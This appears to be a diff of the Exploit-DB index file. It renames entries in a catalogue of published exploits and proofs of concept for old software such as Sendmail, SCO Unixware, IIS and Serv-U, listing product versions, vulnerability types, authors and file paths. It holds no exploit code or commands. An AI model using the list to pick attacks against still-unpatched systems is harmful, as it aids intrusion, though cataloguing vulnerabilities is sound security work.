19556,platforms/multiple/local/19556.sh,"BSD 2 / CND 1 / Sendmail 8.x / FreeBSD 2.1.x / HP-UX 10.x / AIX 4 / RedHat 4 - Sendmail Daemon",1996-11-16,"Leshka Zakharoff",multiple,local,0 @@ -16936,7 +16939,7 @@ id,file,description,date,author,platform,type,port 19562,platforms/windows/dos/19562.pl,"MediaHouse Software Statistics Server 4.28/5.1 - 'Server ID' Buffer Overflow",1999-09-30,"Per Bergehed",windows,dos,0 19563,platforms/windows/dos/19563.txt,"Photodex ProShow Producer 5.0.3256 - Buffer Overflow",2012-07-03,"Julien Ahrens",windows,dos,0 19564,platforms/bsd/dos/19564.c,"Axent Raptor 6.0 - Denial of Service",1999-10-21,MSG.Net,bsd,dos,0 -19565,platforms/linux/local/19565.sh,"S.u.S.E. Linux 6.1/6.2 - cwdtools",1999-10-22,"Brock Tellier",linux,local,0 +19565,platforms/linux/local/19565.sh,"S.u.S.E. Linux 6.1/6.2 - cwdtools Exploit",1999-10-22,"Brock Tellier",linux,local,0 19566,platforms/windows/remote/19566.c,"Omnicron OmniHTTPd 1.1/2.4 Pro - Buffer Overflow",1999-10-22,UNYUN,windows,remote,0 19567,platforms/linux/remote/19567.txt,"National Science Foundation Squid Web Proxy 1.0/1.1/2.1 - Authentication Failure",1999-10-25,"Oezguer Kesim",linux,remote,0 19568,platforms/windows/remote/19568.txt,"pacific software url live! 1.0 - Directory Traversal",1999-10-28,UNYUN,windows,remote,0 @@ -17028,17 +17031,17 @@ id,file,description,date,author,platform,type,port 19652,platforms/freebsd/local/19652.c,"FreeBSD 3.3 xmindpath - Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0 19653,platforms/freebsd/local/19653.c,"FreeBSD 3.3 angband - Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0 40430,platforms/windows/local/40430.cs,"Microsoft Windows - RegLoadAppKey Hive Enumeration Privilege Escalation (MS16-111)",2016-09-26,"Google Security Research",windows,local,0 -19654,platforms/sco/local/19654.pl,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'uidadmin'",1998-12-02,"Brock Tellier",sco,local,0 +19654,platforms/sco/local/19654.pl,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'uidadmin' Exploit",1998-12-02,"Brock Tellier",sco,local,0 19655,platforms/linux/local/19655.txt,"RSA Security RSAREF 2.0 - Buffer Overflow",1999-12-14,"Alberto Solino",linux,local,0 19656,platforms/sco/local/19656.c,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'xauto' Buffer Overflow",1999-12-03,"Brock Tellier",sco,local,0 19657,platforms/sco/local/19657.txt,"SCO Unixware 7.1 - '/var/mail' Permissions",1999-12-03,"Brock Tellier",sco,local,0 -19658,platforms/sco/local/19658.txt,"SCO Unixware 7.1 - 'pkg' commands",1999-12-03,"Brock Tellier",sco,local,0 +19658,platforms/sco/local/19658.txt,"SCO Unixware 7.1 - 'pkg' command Exploit",1999-12-03,"Brock Tellier",sco,local,0 19659,platforms/sco/local/19659.sh,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'coredump' Symlink",1999-12-03,"Brock Tellier",sco,local,0 19660,platforms/sco/local/19660.c,"SCO Unixware 7.1 pkgcat - Buffer Overflow",1999-12-06,"Brock Tellier",sco,local,0 19661,platforms/sco/local/19661.c,"SCO Unixware 7.1 pkginstall - Buffer Overflow",1999-12-06,"Brock Tellier",sco,local,0 19662,platforms/windows/remote/19662.txt,"Microsoft Internet Explorer 4.1/5.0/4.0.1 - Subframe Spoofing",1999-11-30,"Georgi Guninski",windows,remote,0 19663,platforms/solaris/remote/19663.c,"Solaris 2.3/2.4/2.5/2.5.1/2.6/7.0 snoop - (print_domain_name) Buffer Overflow",1999-12-07,K2,solaris,remote,0 -19664,platforms/windows/dos/19664.txt,"Cat Soft Serv-U 2.5a - Server SITE PASS Denial of Service",1999-12-02,"Ussr Labs",windows,dos,0 +19664,platforms/windows/dos/19664.txt,"Cat Soft Serv-U FTP Server 2.5a - SITE PASS Denial of Service",1999-12-02,"Ussr Labs",windows,dos,0 19665,platforms/windows/local/19665.txt,"Microsoft Internet Explorer 5 - vnd.ms.radio URL",1999-12-06,"Jeremy Kothe",windows,local,0 19666,platforms/windows/dos/19666.txt,"GoodTech Telnet Server NT 2.2.1 - Denial of Service",1999-12-06,"Ussr Labs",windows,dos,0 19667,platforms/multiple/remote/19667.c,"WolfPack Development XSHIPWARS 1.0/1.2.4 - Buffer Overflow",1999-12-09,"Amanda Woodward",multiple,remote,0 @@ -17073,15 +17076,15 @@ id,file,description,date,author,platform,type,port 19701,platforms/linux/dos/19701.sh,"Eric Allman Sendmail 8.9.1/8.9.3 - ETRN Denial of Service",1999-12-22,"Michal Zalewski",linux,dos,0 19702,platforms/windows/dos/19702.txt,"BroadGun Software CamShot WebCam 2.5 - GET Buffer Overflow",1999-12-30,"Ussr Labs",windows,dos,0 19703,platforms/windows/dos/19703.txt,"AnalogX SimpleServer:WWW 1.0.1 - GET Buffer Overflow",1999-12-31,"Ussr Labs",windows,dos,0 -19704,platforms/multiple/local/19704.sh,"Nortel Networks Optivity NETarchitect 2.0 - PATH",1999-12-30,Loneguard,multiple,local,0 +19704,platforms/multiple/local/19704.sh,"Nortel Networks Optivity NETarchitect 2.0 - PATH Exploit",1999-12-30,Loneguard,multiple,local,0 19705,platforms/unixware/remote/19705.c,"Netscape FastTrack Server 2.0.1a - GET Buffer Overflow",1999-12-31,"Brock Tellier",unixware,remote,0 -19706,platforms/irix/local/19706.sh,"SGI IRIX 6.2 - midikeys/soundplayer",1999-12-31,Loneguard,irix,local,0 +19706,platforms/irix/local/19706.sh,"SGI IRIX 6.2 - midikeys/soundplayer Exploit",1999-12-31,Loneguard,irix,local,0 19707,platforms/unix/local/19707.sh,"Ascend CascadeView/UX 1.0 tftpd - Symbolic Link",1999-12-31,Loneguard,unix,local,0 19708,platforms/php/remote/19708.php,"PHP 3.0.13 - 'Safe_mode' Failure",2000-01-04,"Kristian Koehntopp",php,remote,0 19709,platforms/linux/local/19709.sh,"Mandrake 6.x / RedHat 6.x / Turbolinux 3.5 b2/4.x/6.0.2 userhelper/PAM - Path Exploit (1)",2000-01-04,dildog,linux,local,0 19710,platforms/linux/local/19710.c,"Mandrake 6.x / RedHat 6.x / Turbolinux 3.5 b2/4.x/6.0.2 userhelper/PAM - Path Exploit (2)",2000-03-15,"Elias Levy",linux,local,0 19711,platforms/windows/dos/19711.txt,"Ipswitch IMail 5.0.8/6.0/6.1 - IMonitor status.cgi Denial of Service",2000-01-05,"Ussr Labs",windows,dos,0 -19712,platforms/multiple/remote/19712.txt,"Allaire ColdFusion Server 4.0/4.0.1 - CFCACHE",2000-01-04,anonymous,multiple,remote,0 +19712,platforms/multiple/remote/19712.txt,"Allaire ColdFusion Server 4.0/4.0.1 - 'CFCACHE' Exploit",2000-01-04,anonymous,multiple,remote,0 19713,platforms/cgi/remote/19713.pl,"Solution Scripts Home Free 1.0 - search.cgi Directory Traversal",2000-01-03,"k0ad k1d",cgi,remote,0 40086,platforms/ruby/remote/40086.rb,"Ruby on Rails ActionPack Inline ERB - Code Execution (Metasploit)",2016-07-11,Metasploit,ruby,remote,80 19715,platforms/php/webapps/19715.txt,"WordPress Plugin WP-Predict 1.0 - Blind SQL Injection",2012-07-10,"Chris Kellum",php,webapps,0 @@ -17112,7 +17115,7 @@ id,file,description,date,author,platform,type,port 19740,platforms/windows/dos/19740.c,"Jgaa WarFTPd 1.66 x4s/1.67-3 - (CWD/MKD) Denial of Service",2000-02-03,crc,windows,dos,0 19741,platforms/cgi/remote/19741.pl,"Wired Community Software WWWThreads 5.0 - SQL Command Input",2000-02-03,"rain forest puppy",cgi,remote,0 19742,platforms/multiple/remote/19742.txt,"Microsoft IIS 3.0/4.0 / Microsoft index server 2.0 - Directory Traversal",2000-02-02,Mnemonix,multiple,remote,0 -19743,platforms/windows/remote/19743.txt,"Cat Soft Serv-U 2.5/a/b / Windows 2000/95/98/NT 4.0 - Shortcut",2000-02-04,"Ussr Labs",windows,remote,0 +19743,platforms/windows/remote/19743.txt,"Cat Soft Serv-U FTP Server 2.5/a/b (Windows 2000/95/98/NT 4.0) - Shortcut Exploit",2000-02-04,"Ussr Labs",windows,remote,0 19744,platforms/novell/dos/19744.txt,"Novell Groupwise Enhancement Pack 5.5 Enhancement Pack - Denial of Service",2000-02-07,"Adam Gray",novell,dos,0 19745,platforms/cgi/remote/19745.txt,"Daniel Beckham The Finger Server 0.82 Beta - Pipe",2000-02-04,"Iain Wade",cgi,remote,0 19746,platforms/novell/dos/19746.txt,"Novell BorderManager 3.0/3.5 Audit Trail Proxy - Denial of Service",2000-02-04,"Chicken Man",novell,dos,0 @@ -17123,7 +17126,7 @@ id,file,description,date,author,platform,type,port 19751,platforms/multiple/remote/19751.txt,"Ascom COLTSOHO / Brocade Fabric OS / MatchBox / Win98/NT4 / Solaris / Xyplex - SNMP World Writeable Community",2000-02-15,"Michal Zalewski",multiple,remote,0 19752,platforms/sco/local/19752.txt,"SCO Unixware 7.1/7.1.1 - ARCserver /tmp symlink",2000-02-15,"Shawn Bracken",sco,local,0 19753,platforms/windows/remote/19753.txt,"Microsoft FrontPage personal WebServer 1.0/personal Web server 4.0 - Directory Traversal",1996-01-17,kiborg,windows,remote,0 -19754,platforms/windows/local/19754.txt,"Microsoft Windows 95/98/NT 4.0 - autorun.inf",2000-02-18,"Eric Stevens",windows,local,0 +19754,platforms/windows/local/19754.txt,"Microsoft Windows 95/98/NT 4.0 - autorun.inf Exploit",2000-02-18,"Eric Stevens",windows,local,0 19755,platforms/windows/dos/19755.txt,"Pragma Systems InterAccess TelnetD Server 4.0 Build 4 - Buffer Overflow",2000-02-21,"Ussr Labs",windows,dos,0 19756,platforms/freebsd/local/19756.txt,"FreeBSD 3.0/3.1/3.2/3.3/3.4 Asmon/Ascpu - Exploit",2000-02-19,anonymous,freebsd,local,0 19757,platforms/solaris/local/19757.txt,"Sun Workshop 5.0 - Licensing Manager Symlink",2000-02-21,sp00n,solaris,local,0 @@ -17133,14 +17136,14 @@ id,file,description,date,author,platform,type,port 19761,platforms/windows/remote/19761.txt,"Sambar Server 4.2 Beta 7 - Batch CGI",2000-02-24,"Georich Chorbadzhiyski",windows,remote,0 19762,platforms/linux/local/19762.c,"FTPx FTP Explorer 1.0.00.10 - Weak Password Encryption",2000-02-25,"Nelson Brito",linux,local,0 19763,platforms/linux/local/19763.txt,"RedHat Linux 6.0 - Single User Mode Authentication",2000-02-23,"Darren Reed",linux,local,0 -19764,platforms/linux/local/19764.txt,"Corel Linux OS 1.0 - buildxconfig",2000-02-24,suid,linux,local,0 -19765,platforms/linux/local/19765.txt,"Corel Linux OS 1.0 - setxconf",2000-02-24,suid,linux,local,0 +19764,platforms/linux/local/19764.txt,"Corel Linux OS 1.0 - buildxconfig Exploit",2000-02-24,suid,linux,local,0 +19765,platforms/linux/local/19765.txt,"Corel Linux OS 1.0 - setxconf Exploit",2000-02-24,suid,linux,local,0 19766,platforms/hardware/dos/19766.txt,"Nortel Networks Nautica Marlin - Denial of Service",2000-02-25,"Christophe GRENIER",hardware,dos,0 19768,platforms/php/webapps/19768.txt,"House Style 0.1.2 - readfile() Local File Disclosure",2012-07-12,GoLd_M,php,webapps,0 19769,platforms/php/webapps/19769.txt,"eCan 0.1 - Local File Disclosure",2012-07-12,GoLd_M,php,webapps,0 19771,platforms/php/webapps/19771.txt,"Lc Flickr Carousel 1.0 - Local File Disclosure",2012-07-12,GoLd_M,php,webapps,0 19772,platforms/windows/dos/19772.txt,"WaveSurfer 1.8.8p4 - Memory Corruption (PoC)",2012-07-12,"Jean Pascal Pereira",windows,dos,0 -19774,platforms/hardware/webapps/19774.txt,"TP Link Gateway 3.12.4 - Multiple Vulnerabilities",2012-07-12,Vulnerability-Lab,hardware,webapps,0 +19774,platforms/hardware/webapps/19774.txt,"TP-Link Gateway 3.12.4 - Multiple Vulnerabilities",2012-07-12,Vulnerability-Lab,hardware,webapps,0 19775,platforms/php/webapps/19775.txt,"Reserve Logic 1.2 Booking CMS - Multiple Vulnerabilities",2012-07-12,Vulnerability-Lab,php,webapps,0 19776,platforms/windows/local/19776.pl,"ZipItFast PRO 3.0 - Heap Overflow",2012-07-12,b33f,windows,local,0 19777,platforms/windows/dos/19777.txt,"Microsoft Internet Explorer 9 / SharePoint / Lync - toStaticHTML HTML Sanitizing Bypass",2012-07-12,"Adi Cohen",windows,dos,0 @@ -17154,7 +17157,7 @@ id,file,description,date,author,platform,type,port 19785,platforms/unix/remote/19785.txt,"The ht://Dig Group ht://Dig 3.1.1/3.1.2/3.1.3/3.1.4/3.2 .0b1 - Arbitrary File Inclusion",2000-02-29,"Geoff Hutchison",unix,remote,0 19786,platforms/cgi/remote/19786.txt,"DNSTools Software DNSTools 1.0.8/1.10 - Input Validation",2000-03-02,"Jonathan Leto",cgi,remote,0 19787,platforms/linux/local/19787.txt,"Corel Linux OS 1.0 - Denial of Serviceemu Distribution Configuration",2000-03-02,suid,linux,local,0 -19788,platforms/irix/remote/19788.pl,"SGI InfoSearch 1.0 / SGI IRIX 6.5.x - fname",2000-03-05,rpc,irix,remote,0 +19788,platforms/irix/remote/19788.pl,"SGI InfoSearch 1.0 / SGI IRIX 6.5.x - fname Exploit",2000-03-05,rpc,irix,remote,0 19789,platforms/windows/local/19789.txt,"Microsoft Clip Art Gallery 5.0 - Buffer Overflow",2000-03-06,dildog,windows,local,0 19790,platforms/php/webapps/19790.txt,"webpagetest 2.6 - Multiple Vulnerabilities",2012-07-13,dun,php,webapps,0 19791,platforms/php/webapps/19791.txt,"WordPress Plugin Resume Submissions & Job Postings 2.5.1 - Unrestricted Arbitrary File Upload",2012-07-13,"Chris Kellum",php,webapps,0 @@ -17162,7 +17165,7 @@ id,file,description,date,author,platform,type,port 19830,platforms/windows/remote/19830.txt,"Microsoft Index Server 2.0 - '%20' ASP Source Disclosure",2000-03-31,"David Litchfield",windows,remote,0 19794,platforms/linux/local/19794.txt,"Oracle8i Standard Edition 8.1.5 for Linux Installer - Exploit",2000-03-05,"Keyser Soze",linux,local,0 19795,platforms/cgi/remote/19795.txt,"Caldera OpenLinux 2.3 - rpm_query CGI",2000-03-05,harikiri,cgi,remote,0 -19796,platforms/multiple/local/19796.c,"Matt Kimball and Roger Wolff mtr 0.28/0.41 / Turbolinux 3.5 b2/4.2/4.4/6.0 - mtr (2)",2000-03-03,"Babcia Padlina",multiple,local,0 +19796,platforms/multiple/local/19796.c,"Matt Kimball and Roger Wolff mtr 0.28/0.41 / Turbolinux 3.5 b2/4.2/4.4/6.0 - mtr Exploit (2)",2000-03-03,"Babcia Padlina",multiple,local,0 19797,platforms/unix/remote/19797.txt,"Sun StarOffice 5.1 - Arbitrary File Read",2000-03-09,"Vanja Hrustic",unix,remote,0 19798,platforms/windows/local/19798.txt,"Microsoft Windows NT 4.0 - User Shell Folders",2000-03-09,anonymous,windows,local,0 19799,platforms/windows/dos/19799.txt,"Microsoft Windows 2000/95/98/ME/NT 3.5.x/Enterprise Server 4.0/Terminal Server 4.0/Workstation 4.0 Microsoft DoS Device Name - Denial of Service",2000-03-04,anonymous,windows,dos,0 @@ -17177,9 +17180,9 @@ id,file,description,date,author,platform,type,port 19808,platforms/cgi/remote/19808.txt,"Generation Terrorists Designs & Concepts Sojourn 2.0 - File Access",2000-03-14,"Cerberus Security Team",cgi,remote,0 19809,platforms/windows/remote/19809.txt,"Oracle Web Listener 4.0.x - for NT Batch File",2000-03-15,"Cerberus Security Team",windows,remote,0 19810,platforms/windows/dos/19810.txt,"Atrium Software Mercur WebView WebMail-Client 1.0 - Buffer Overflow",2000-03-16,"Ussr Labs",windows,dos,0 -19811,platforms/linux/local/19811.c,"Halloween Linux 4.0 / RedHat Linux 6.1/6.2 - imwheel (1)",2000-03-13,funkysh,linux,local,0 -19812,platforms/linux/local/19812.c,"Halloween Linux 4.0 / RedHat Linux 6.1/6.2 - imwheel (2)",2000-03-13,"S. Krahmer & Stealth",linux,local,0 -19813,platforms/linux/local/19813.txt,"Halloween Linux 4.0 / S.u.S.E. Linux 6.0/6.1/6.2/6.3 - kreatecd",2000-03-16,Sebastian,linux,local,0 +19811,platforms/linux/local/19811.c,"Halloween Linux 4.0 / RedHat Linux 6.1/6.2 - imwheel Exploit (1)",2000-03-13,funkysh,linux,local,0 +19812,platforms/linux/local/19812.c,"Halloween Linux 4.0 / RedHat Linux 6.1/6.2 - imwheel Exploit (2)",2000-03-13,"S. Krahmer & Stealth",linux,local,0 +19813,platforms/linux/local/19813.txt,"Halloween Linux 4.0 / S.u.S.E. Linux 6.0/6.1/6.2/6.3 - kreatecd Exploit",2000-03-16,Sebastian,linux,local,0 19814,platforms/multiple/remote/19814.c,"Netscape Enterprise Server 3.0/3.6/3.51 - Directory Indexing",2000-03-17,"Gabriel Maggiotti",multiple,remote,0 19815,platforms/windows/remote/19815.txt,"vqsoft vqserver for windows 1.9.9 - Directory Traversal",2000-03-21,"Johan Nilsson",windows,remote,0 19816,platforms/linux/local/19816.txt,"gpm 1.18.1/1.19 / Debian 2.x / RedHat 6.x / S.u.S.E 5.3/6.x - gpm Setgid",2000-03-22,"Egmont Koblinger",linux,local,0 @@ -17248,7 +17251,7 @@ id,file,description,date,author,platform,type,port 19879,platforms/linux/remote/19879.txt,"RedHat 6.2 - Piranha Virtual Server Package Default Account and Password",2000-04-24,"Max Vision",linux,remote,0 19880,platforms/windows/dos/19880.txt,"Symantec pcAnywhere 8.0.1/8.0.2/9.0/9.2 - Port Scan Denial of Service",2000-04-25,Vacuum,windows,dos,0 19881,platforms/windows/remote/19881.txt,"McMurtrey/Whitaker & Associates Cart32 2.6/3.0 - Remote Administration Password",2000-04-27,"Cerberus Security Team",windows,remote,0 -19882,platforms/hardware/remote/19882.pl,"Cisco IOS 11.x/12.x - HTTP %%",2000-04-26,"Keith Woodworth",hardware,remote,0 +19882,platforms/hardware/remote/19882.pl,"Cisco IOS 11.x/12.x - HTTP %% Exploit",2000-04-26,"Keith Woodworth",hardware,remote,0 19883,platforms/linux/local/19883.c,"S.u.S.E. Linux 6.3/6.4 Gnomelib - Buffer Overflow",2000-04-29,bladi,linux,local,0 19884,platforms/windows/dos/19884.txt,"Atrium Software Cassandra NNTP Server 1.10 - Buffer Overflow",2000-05-01,"Ussr Labs",windows,dos,0 19885,platforms/windows/dos/19885.txt,"Qualcomm Eudora 4.2/4.3 - Warning Message Circumvention",2000-04-28,"Bennett Haselton",windows,dos,0 @@ -17265,7 +17268,7 @@ id,file,description,date,author,platform,type,port 19897,platforms/windows/remote/19897.txt,"FrontPage 2000 / IIS 4.0/5.0 - Server Extensions Full Path Disclosure",2000-05-06,"Frankie Zie",windows,remote,0 19898,platforms/php/webapps/19898.txt,"Forum Oxalis 0.1.2 - SQL Injection",2012-07-17,"Jean Pascal Pereira",php,webapps,0 19899,platforms/cgi/dos/19899.txt,"UltraBoard 1.6 - Denial of Service",2000-05-05,"Juan M. Bello Rivas",cgi,dos,0 -19900,platforms/linux/local/19900.c,"RedHat Linux 6.0/6.1/6.2 - pam_console",2000-05-03,"Michal Zalewski",linux,local,0 +19900,platforms/linux/local/19900.c,"RedHat Linux 6.0/6.1/6.2 - pam_console Exploit",2000-05-03,"Michal Zalewski",linux,local,0 19901,platforms/hardware/remote/19901.txt,"Netopia R-series routers 4.6.2 - Exploit",2000-05-16,"Stephen Friedl",hardware,remote,0 20010,platforms/php/webapps/20010.txt,"X-Cart Gold 4.5 - (products_map.php symb Parameter) Cross-Site Scripting",2012-07-21,muts,php,webapps,0 19906,platforms/multiple/remote/19906.txt,"Matt Wright FormMail 1.6/1.7/1.8 - Environmental Variables Disclosure",2000-05-10,"Black Watch Labs",multiple,remote,0 @@ -17345,7 +17348,7 @@ id,file,description,date,author,platform,type,port 19987,platforms/linux/dos/19987.py,"ptunnel 0.72 - Remote Denial of Service",2012-07-20,st3n,linux,dos,0 19988,platforms/windows/dos/19988.pl,"httpdx 1.5.4 - Remote HTTP Server Denial of Service",2012-07-20,st3n,windows,dos,0 19989,platforms/windows/local/19989.c,"PassWD 1.2 - Weak Encryption",2000-06-04,"Daniel Roethlisberger",windows,local,0 -19990,platforms/hp-ux/local/19990.txt,"HP-UX 10.20/11.0 man - /tmp symlink",2000-06-02,"Jason Axley",hp-ux,local,0 +19990,platforms/hp-ux/local/19990.txt,"HP-UX 10.20/11.0 man - /tmp Symlink Exploit",2000-06-02,"Jason Axley",hp-ux,local,0 19991,platforms/linux/local/19991.c,"BSD mailx 8.1.1-10 - Buffer Overflow (1)",2000-06-02,"Paulo Ribeiro",linux,local,0 19992,platforms/linux/local/19992.c,"BSD mailx 8.1.1-10 - Buffer Overflow (2)",1999-07-03,funkysh,linux,local,0 19993,platforms/windows/local/19993.txt,"Mirabilis ICQ 2000.0 A - Mailclient Temporary Link",2000-06-06,"Gert Fokkema",windows,local,0 @@ -17481,7 +17484,7 @@ id,file,description,date,author,platform,type,port 20135,platforms/windows/remote/20135.txt,"nai net tools pki server 1.0 - Directory Traversal",2000-08-02,"Juliano Rizzo",windows,remote,0 20136,platforms/windows/remote/20136.txt,"NAI Net Tools PKI Server 1.0 - Format String",2000-08-02,"Juliano Rizzo",windows,remote,0 20137,platforms/irix/local/20137.c,"IRIX 6.2/6.3/6.4 - xfs truncate() Privilege Check",1997-02-01,"Last Stage of Delirium",irix,local,0 -20138,platforms/irix/local/20138.c,"IRIX 5.3/6.x - mail",1997-09-01,"Last Stage of Delirium",irix,local,0 +20138,platforms/irix/local/20138.c,"IRIX 5.3/6.x - mail Exploit",1997-09-01,"Last Stage of Delirium",irix,local,0 20139,platforms/multiple/remote/20139.txt,"Sun JDK 1.1.x / Sun JRE 1.1.x - Listening Socket",2000-08-03,"Alexey Yarovinsky",multiple,remote,0 20140,platforms/multiple/remote/20140.txt,"Netscape Communicator 4.x - URL Read",2000-08-03,"Dan Brumleve",multiple,remote,0 20141,platforms/linux/local/20141.pl,"SUIDPerl 5.00503 - Mail Shell Escape (1)",2000-08-07,"Sebastian Krahmer",linux,local,0 @@ -17568,7 +17571,7 @@ id,file,description,date,author,platform,type,port 20225,platforms/windows/dos/20225.pl,"Alt-N MDaemon 3.1.1 - Denial of Service",1999-12-01,"Ussr Labs",windows,dos,0 20226,platforms/freebsd/dos/20226.c,"FreeBSD Kernel - SCTP Remote NULL Ptr Dereference Denial of Service",2012-08-03,"Shaun Colley",freebsd,dos,0 20542,platforms/windows/local/20542.rb,"GlobalScape CuteZIP - Stack Buffer Overflow (Metasploit)",2012-08-15,Metasploit,windows,local,0 -20228,platforms/windows/dos/20228.pl,"TYPSoft 0.7 x - FTP Server Remote Denial of Service",1999-06-08,dethy,windows,dos,0 +20228,platforms/windows/dos/20228.pl,"TYPSoft FTP Server 0.7.x - FTP Server Remote Denial of Service",1999-06-08,dethy,windows,dos,0 20229,platforms/multiple/dos/20229.txt,"IBM Websphere Application Server 3.0.2 Server Plugin - Denial of Service",2000-09-15,"Rude Yak",multiple,dos,0 20230,platforms/sco/local/20230.c,"Tridia DoubleVision 3.0 7.00 - Privilege Escalation",2000-06-24,"Stephen J. Friedl",sco,local,0 20231,platforms/hardware/remote/20231.txt,"Cisco PIX Firewall 4.x/5.x - SMTP Content Filtering Evasion",2000-09-19,"Lincoln Yeoh",hardware,remote,0 @@ -17649,7 +17652,7 @@ id,file,description,date,author,platform,type,port 20309,platforms/windows/remote/20309.txt,"Microsoft IIS 3.0 - newdsn.exe File Creation",1997-08-25,"Vytis Fedaravicius",windows,remote,0 20310,platforms/windows/dos/20310.txt,"Microsoft IIS 4.0 - Pickup Directory Denial of Service",2000-02-15,Valentijn,windows,dos,0 20311,platforms/windows/dos/20311.c,"Avirt Mail 4.0/4.2 - 'Mail From:' and 'Rcpt to:' Denial of Service",2000-10-23,Martin,windows,dos,0 -20312,platforms/linux/local/20312.c,"Oracle Internet Directory 2.0.6 - oidldap",2000-10-18,"Juan Manuel Pascual Escribá",linux,local,0 +20312,platforms/linux/local/20312.c,"Oracle Internet Directory 2.0.6 - oidldap Exploit",2000-10-18,"Juan Manuel Pascual Escribá",linux,local,0 20313,platforms/multiple/remote/20313.txt,"Allaire JRun 3 - Directory Disclosure",2000-10-23,"Foundstone Labs",multiple,remote,0 20314,platforms/multiple/remote/20314.txt,"Allaire JRun 2.3 - Arbitrary Code Execution",2000-10-23,"Foundstone Labs",multiple,remote,0 20315,platforms/multiple/remote/20315.txt,"Allaire JRun 2.3 - File Source Code Disclosure",2000-10-23,"Foundstone Labs",multiple,remote,0 @@ -17671,7 +17674,7 @@ id,file,description,date,author,platform,type,port 20331,platforms/hardware/dos/20331.c,"Ascend R 4.5 Ci12 - Denial of Service (1)",1998-03-16,Rootshell,hardware,dos,0 20332,platforms/hardware/dos/20332.pl,"Ascend R 4.5 Ci12 - Denial of Service (2)",1998-03-17,Rootshell,hardware,dos,0 20333,platforms/unix/local/20333.c,"Exim Buffer 1.6.2/1.6.51 - Overflow Exploit",1997-07-21,"D. J. Bernstein",unix,local,0 -20334,platforms/windows/remote/20334.java,"CatSoft FTP Serv-U 2.5.x - Brute Force",2000-10-29,Craig,windows,remote,0 +20334,platforms/windows/remote/20334.java,"Cat Soft Serv-U FTP Server 2.5.x - Brute Force",2000-10-29,Craig,windows,remote,0 20335,platforms/windows/remote/20335.txt,"Microsoft Indexing Services (Windows 2000/NT 4.0) - '.htw' Cross-Site Scripting",2000-10-28,"Georgi Guninski",windows,remote,0 20336,platforms/multiple/dos/20336.txt,"Unify eWave ServletExec 3.0 c - Denial of Service",2000-10-30,"Foundstone Labs",multiple,dos,0 20337,platforms/unix/remote/20337.c,"tcpdump 3.4/3.5 - AFS ACL Packet Buffer Overflow",2001-01-02,Zhodiac,unix,remote,0 @@ -17741,7 +17744,7 @@ id,file,description,date,author,platform,type,port 21041,platforms/multiple/dos/21041.txt,"Microsoft Internet Explorer 3/4/5 / Netscape Communicator 4 - IMG Tag Denial of Service",2001-06-19,"John Percival",multiple,dos,0 20401,platforms/windows/local/20401.txt,"Computer Associates InoculateIT 4.53 - Microsoft Exchange Agent",2000-11-10,"Hugo Caye",windows,local,0 20402,platforms/linux/local/20402.sh,"Linux modutils 2.3.9 - modprobe Arbitrary Command Execution",2000-11-12,"Michal Zalewski",linux,local,0 -20403,platforms/windows/dos/20403.txt,"Small HTTP server 2.0 1 - Non-Existent File Denial of Service",2000-11-14,"403-security team",windows,dos,0 +20403,platforms/windows/dos/20403.txt,"Small HTTP Server 2.0 1 - Non-Existent File Denial of Service",2000-11-14,"403-security team",windows,dos,0 20404,platforms/beos/remote/20404.txt,"Joe Kloss RobinHood 1.1 - Buffer Overflow",2000-11-14,Vort-fu,beos,remote,0 20405,platforms/cgi/remote/20405.pl,"DCForum 1-6 - Arbitrary File Disclosure",2000-11-14,steeLe,cgi,remote,0 20406,platforms/multiple/remote/20406.txt,"RealServer 5.0/6.0/7.0 - Memory Contents Disclosure",2000-11-16,CORE-SDI,multiple,remote,0 @@ -17759,7 +17762,7 @@ id,file,description,date,author,platform,type,port 20419,platforms/php/webapps/20419.txt,"Flynax General Classifieds 4.0 CMS - Multiple Vulnerabilities",2012-08-11,Vulnerability-Lab,php,webapps,0 20421,platforms/php/webapps/20421.txt,"ProQuiz 2.0.2 - Multiple Vulnerabilities",2012-08-11,L0n3ly-H34rT,php,webapps,0 20422,platforms/php/webapps/20422.txt,"MobileCartly 1.0 - Arbitrary File Write",2012-08-10,"Yakir Wizman",php,webapps,0 -20423,platforms/cgi/remote/20423.txt,"NCSA httpd-campas 1.2 - sample script",1997-07-15,"Francisco Torres",cgi,remote,0 +20423,platforms/cgi/remote/20423.txt,"NCSA httpd-campas 1.2 - sample script Exploit",1997-07-15,"Francisco Torres",cgi,remote,0 20425,platforms/multiple/remote/20425.pl,"Microsys CyberPatrol 4.0 4.003/4.0 4.005 - Insecure Registration",2000-11-22,"Joey Maier",multiple,remote,0 20426,platforms/windows/remote/20426.html,"Microsoft Internet Explorer 5.5 - Index.dat",2000-11-23,"Georgi Guninski",windows,remote,0 20427,platforms/windows/remote/20427.txt,"Microsoft Windows Media Player 7.0 - '.asx' Buffer Overflow",2000-11-22,@stake,windows,remote,0 @@ -17783,7 +17786,7 @@ id,file,description,date,author,platform,type,port 20445,platforms/windows/remote/20445.txt,"Microsoft IIS 1.0 / Netscape Server 1.0/1.12 / OReilly WebSite Professional 1.1b - '.cmd' / '.CMD' Remote Command Execution",1996-03-01,anonymous,windows,remote,0 20446,platforms/cgi/remote/20446.txt,"WebCom datakommunikation Guestbook 0.1 - wguest.exe Arbitrary File Access",1999-04-09,Mnemonix,cgi,remote,0 20447,platforms/cgi/remote/20447.txt,"WebCom datakommunikation Guestbook 0.1 - rguest.exe Arbitrary File Access",1999-04-09,Mnemonix,cgi,remote,0 -20448,platforms/cgi/remote/20448.txt,"Novell NetWare Web Server 2.x - convert.bas",1996-07-03,"TTT Group",cgi,remote,0 +20448,platforms/cgi/remote/20448.txt,"Novell NetWare Web Server 2.x - convert.bas Exploit",1996-07-03,"TTT Group",cgi,remote,0 20449,platforms/unix/remote/20449.txt,"GlimpseHTTP 1.0/2.0 / WebGlimpse 1.0 - Piped Command",1996-07-03,"Razvan Dragomirescu",unix,remote,0 20450,platforms/multiple/remote/20450.txt,"Trlinux Postaci Webmail 1.1.3 - Password Disclosure",2000-11-30,"Michael R. Rudel",multiple,remote,0 20451,platforms/windows/local/20451.c,"Microsoft SQL Server 7.0/2000 / Data Engine 1.0/2000 - xp_displayparamstmt Buffer Overflow",2000-12-01,"David Litchfield",windows,local,0 @@ -17796,7 +17799,7 @@ id,file,description,date,author,platform,type,port 